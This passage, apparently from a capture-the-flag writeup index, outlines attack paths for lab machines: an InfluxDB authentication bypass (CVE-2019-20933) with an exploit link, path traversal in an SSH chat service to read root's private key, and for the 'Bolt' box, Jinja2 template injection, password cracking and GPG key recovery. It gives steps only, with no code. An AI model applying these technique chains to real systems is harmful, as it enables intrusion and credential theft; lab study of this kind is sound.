  • System enumeration – InfluxDB running on port 8086 – Authentication Bypass (CVE-2019-20933) – (https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) – Obtaining user credentials – User pivoting to “catherine“.

System Own:

  • System enumeration – Chat over SSH beta running on port 8443.
  • Chat Backup file – Harcode password.
  • SSH chat abussing command /file and path traversal to read systems file as root user – get root id_rsa.

Bolt

By: d4rkpayl0ad & TheCyberGeek

Linux – 10.10.11.114 Medium

Linux bolt.htb 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.03 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80/443HTTPnginx 1.18.0

User Own:

  • Virtual Hosting.
  • Download and analysis docker image – db.sqlite3 file with user credentials – Password cracking – Access admin LTE3 (https://adminlte.io/).
  • Information leaked – Subdomain fuzzing.
  • Searching invite_code into docker image file to create an account – Access admin LTE3 demo and roundcube mail.
  • Server Side Template Injection (SSTi – jinja2) – Access as “www-data” user.
  • System enumeration as www-data – Mysql credentials into passbolt php file – Database enumeration – Find a PGP encrypted message.
  • Password reused for user “eddie“.
  • System enumeration as eddie – Find GPG private key into a google chrome log file – GPG2john – Cracking GPG hash –

System Own:

  • System enumeration as eddie – Find GPG private key into a google chrome log file – GPG2john – Cracking GPG hash – Decrypt GPG message to read a password.
  • Password reused for user “root“.